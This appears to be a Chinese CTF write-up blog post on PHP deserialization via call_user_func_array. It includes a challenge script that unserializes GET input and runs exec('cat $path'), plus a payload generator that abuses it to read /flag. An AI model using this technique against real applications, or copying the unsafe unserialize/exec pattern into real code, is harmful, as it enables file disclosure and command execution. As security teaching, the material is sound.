PHP反序列化5(回调函数call_user_func_array)

于 2024-09-28 20:06:05 发布
阅读量214 收藏 4
点赞数 11
分类专栏: PHP反序列化 文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81328699/article/details/142620821
版权

考点5:回调函数call_user_func_array

<aside> 💡

call_user_func_array()函数介绍

</aside>

说明:call_user_func_array ( callable $callback , array $param_arr )

把第一个参数作为回调函数(callback)调用,把参数数组作(param_arr)为回调函数的的参数传入。

注意:

call_user_func_array 与 call_user_func 这两个函数基本上是类似的,只是在调用上传递参数时存在一些差异。

**函数call_user_func_array 传递的第二个参数必须是数组;

函数call_user_func 传递的第二个参数可能是数组,如果是多个参数的话,还是需要以列表的形式列出。

call_user_func ( callback $function [,mixed $parameter [, mixed $...]] )**

<aside> 💡

使用案例

</aside>

**1)普通使用:

           function a($b, $c) {  

                echo $b; 

                echo $c; 

           } 

          call_user_func_array('a', array("111", "222")); 

          //输出 111 222
2)调用类内部的方法:

         Class ClassA { 

                 function bc($b, $c) { 

                  $bc = $b + $c; 

                  echo $bc; 

                 } 

            } 

          call_user_func_array(array('ClassA','bc'), array("111", "222")); 

          //输出  333 

3)支持引用传递:

          function a(&$b) { 

              $b++; 

          } 

          $c = 1; 

          call_user_func_array('a', array(&$c)); 

          echo $c;  //输出 2**

<aside> 💡

C T F例题

</aside>

<?php
class home
{
    private $method;
    private $args;
    function __construct($method, $args)
    {
        $this->method = $method;
        $this->args = $args;
    }

    function __destruct()
    {
        if (in_array($this->method, array("mysys"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }

    function mysys($path)
    {
        print_r(base64_encode(exec("cat $path")));
    }
    function waf($str)
    {
        if (strlen($str) > 8) {
            die("No");
        }
        return $str;
    }

    function __wakeup()
    {
        $num = 0;
        foreach ($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
            $num += 1;
            if ($num > 2) {
                die("No");
            }
        }
    }
}

if ($_GET['path']) {
    $path = @$_GET['path'];
    unserialize($path);
} else {
    highlight_file(__FILE__);

}
?>

代码分析:

  • 传入字符串,然后直接unserialize字符串
  • 反序列化字符串后,自动触发wakeup方法,wakeup方法调用了waf方法。分析过后对我们没什么限制
  • 我们需要的是进入mysys方法,让他触发exec,然后将path变成flag就可以读取flag

答案思路:

  • 所以当我们控制$this->method为mysys就可以调用mysys方法。
  • 再控制$this->args为flag就可以把flag当成函数的参数传入(注意此时回调参数需要数组的形式)
  • 同时这里也使用了私有属性,按照unserialize4考点就可以绕过。

<aside> 💡

payload:

</aside>

<?php
class home
{
    private $method='mysys';
    private $args=['/flag'];
    
}
$o=new home();
$payload=serialize($o);
$payload=str_replace(chr(0), '\\00', $payload);
$payload=str_replace('s:','S:', $payload);
echo($payload);
?>

火红的小辣椒
关注
专栏目录
php soap call_user_func_array,session_start()&bestphp
weixin_39660408的博客
04-04 256
前言又是周末,又是CTF,还是pupil出的题,只能说,非常有趣了bestphpbestphp’s revenge前者来自xctf final,后者来自2018LCTFbestphp1文件包含拿到题目后发现代码非常简短,但是问题很明确,我们看到了函数call_user_func($func,$_GET);这里想到的第一反应是利用extract进行变量覆盖,从而达到任意文件包含例如:?functio...
bestphp‘s revenge SoapClient php处理器反序列化 call_user_func
scrawman的博客
12-08 639
bestphp’s revenge 这道题的知识点还挺多的 源码文件有两个:index.php和flag.php <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION); $a =
[网鼎杯 2020 朱雀组]phpweb(各种读取文件函数,call_user_func()函数和序列化绕过)
qq_44111753的博客
02-04 806
知识点 读取文件的方法 readfile,file_get_contents,highlight_file call_user_func() 第一个参数 callbac 是被调用的回调函数,其余参数是回调函数的参数 序列化 题解: 由于页面不断刷新,所以抓包分析下 post传入了参数data和一串类似日期格式的东西 合理推测是使用了call_user_func()函数,并将date()作为回调函数,由此输出了上面红色框部分 func=readfile&p=index.php
PHP序列化、反序列化
2401_82985722的博客
06-05 1267
1.对象被创建时触发__construct()方法,对象使用完被销毁时触发__destruct()方法。2.对象被序列化时触发了__sleep(),字符串被反序列化时触发了__wakeup()//大写字母O表示对象,4是类名长度,test为类名,表示该类有3个成员属性。类型:长度:“值”…admin=admin,passwd=ctf时得到flag,序列化p。admin=admin,passwd=wllm得到flag,序列化p。4.$a->h()调用了不存在的方法触发了__call()方法。
php反序列化java_PHP反序列化漏洞简介及相关技巧小结
weixin_36411269的博客
02-25 434
*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径要学习PHP反序列漏洞,先了解下PHP序列化和反序列化是什么东西。php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。php序列化的函数为serialize。反序列化的函数为unserialize。序列化举个栗子:...
php 反序列注入,CTF中PHP反序列化和命令注入的一次简单利用
weixin_31796803的博客
04-07 740
代码来自第六届防灾科技学院网络安全技能大赛,侵删。php目标获取Linux服务器根目录下的flagpython代码/*home.php*/class home{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}f...
PHP反序列化
m0_62451321的博客
11-07 5990
POP即:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,是从现有运行 些工作了。一般的序列化攻击都在PHP魔术方法中出现可利用的漏洞,因为自动调用触发漏洞,但如果关键代码没在魔术方法中,而是在一个类的普通方法中。这时候就可以通过构造POP链寻找相同的函数名将类的属性和敏感函数的属性联系起来。(1)先要确定起点和终点,如果起点有多个,那么就去尝试最有可能进行相互跳转的一个,起点和终点无法确定,POP链不可能成功。
反序列化之魔术方法的浅学习
quan9i的博客
05-13 2684
前言 学习反序列化,那么就需要首先掌握魔术方法的使用,本篇文章将尽可能详细的讲解反序列化的魔术方法,博主只是小白,如有问题还请各位师傅多多指点! 魔术方法 常见魔术方法有以下几种 __construct: 在创建对象时候初始化对象,一般用于对变量赋初值。 __destruct: 和构造函数相反,当对象所在函数调用完毕后执行。 __call:当调用对象中不存在的方法会自动调用该方法。 __get():获取对象不存在的属性时执行此函数。 __set():设置对象不存在的属性时执行此函数。 __toString
php 反序列化总结
m0_64815693的博客
12-02 3796
php 反序列化从零开始到啥也不会 横批:一篇足以
第53天:代码审计-TP5框架及无框架变量覆盖反序列化1
08-03
`eval`, `assert`, `preg_replace`, `call_user_func`, `call_user_func_array`等函数允许执行字符串作为代码,这可能导致攻击者执行任意命令。应避免使用`eval`,对于其他函数,确保传入的参数是可信的。 6. **...
PHP phar反序列化
weixin_55190422的博客
09-23 641
以题为例 进来后我们注册一个账户并登录 查看一下网页源代码发,并没有发现什么我们上传个文件看看能不能通过菜刀获取权限 发现并不能连接上。此时我们通过BP抓包看看能不能获取到有用的信息 发现一个filename裸露在我们视野我们考虑让filename=xxx.php获取到index.php 我们这样尝试发现没用这是为啥呢?这里有个细节我们一般上传文件都是在网站主目录下的,所以这里需要跳转到上级目录所以我们需要让filename=../../index.php 出现了index.
Thinkphp5.0.x_RCE复现&5.0.24反序列化大礼包
大博的博客
08-07 6549
环境部署 以TP5.0.22为例 + PHP 5.6.27-NTS + phpstorm2020.1 反序列化环境为:TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 漏洞成因 现在TP的RCE通常将其分成两类: Request类其中变量被覆盖导致RCE 路由控制不严谨导致可以调用任意类致使RCE 反序列化的应用(需要存在反序列化的地方) Request类其中变量被覆盖导致RCE 我们以这个POC为例,进行复现: 我们正常的代码逻辑已经简单的写在了前文,如有代码执行疑
thinkphp3.2.3反序列化利用链分析
qq_53856457的博客
05-21 1028
thinkphp3.2.3反序列化利用链分析 文章目录thinkphp3.2.3反序列化利用链分析前置知识:环境:分析过程 前置知识: PHP反序列化原理 PHP反序列化就是在读取一段字符串然后将字符串反序列化php对象。 在PHP反序列化的过程中会自动执行一些魔术方法 方法名 ---------------调用条件 __call 调用不可访问或不存在的方法时被调用 __callStatic 调用不可访问或不存在的静态方法时被调用 __clone 进行
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
软希网分享源码的博客
09-23 514
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
服务器被挂马,导致网站首页被更改怎么解决
最新发布
KookeeyLena7的博客
09-27 696
当服务器被挂马并导致网站首页被篡改时,说明服务器或网站的安全性遭到破坏。
PHP中error_reporting函数作用
sheji888的专栏
09-24 782
除了使用PHP内置的错误处理机制外,你还可以使用函数来定义自己的错误处理函数。这允许你更灵活地控制错误报告的行为,例如,将错误信息发送到外部系统或显示自定义的错误页面。
web平台搭建-LAMP(CentOS-7)
gsdgdg00的博客
09-24 699
一. 准备工作环境要求:操作系统:CentOS 7.X 64位网络配置:nmtui字符终端图形管理工具或者直接编辑配置文件关闭SELinux和firewalld防火墙防火墙:临时关闭:systemctl stop firewalld永久关闭:systemctl disable firewalld。
php中打印函数
09-24 367
PHP中,打印函数主要用于输出或显示数据。常用的打印函数包括:
php call_user_func_array
05-31
`call_user_func_array` 是一个 PHP 函数,用于调用一个函数或方法,并且使用一个数组作为参数传递。它的语法如下: ```php call_user_func_array(callable $callback, array $param_arr): mixed ``` 其中,`$callback` 参数是一个可调用的函数或方法,`$param_arr` 参数是一个包含函数或方法参数的数组。`call_user_func_array` 函数将 `$param_arr` 数组中的元素作为参数传递给 `$callback` 函数或方法,并返回其执行结果。这个函数在使用动态参数列表时非常有用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值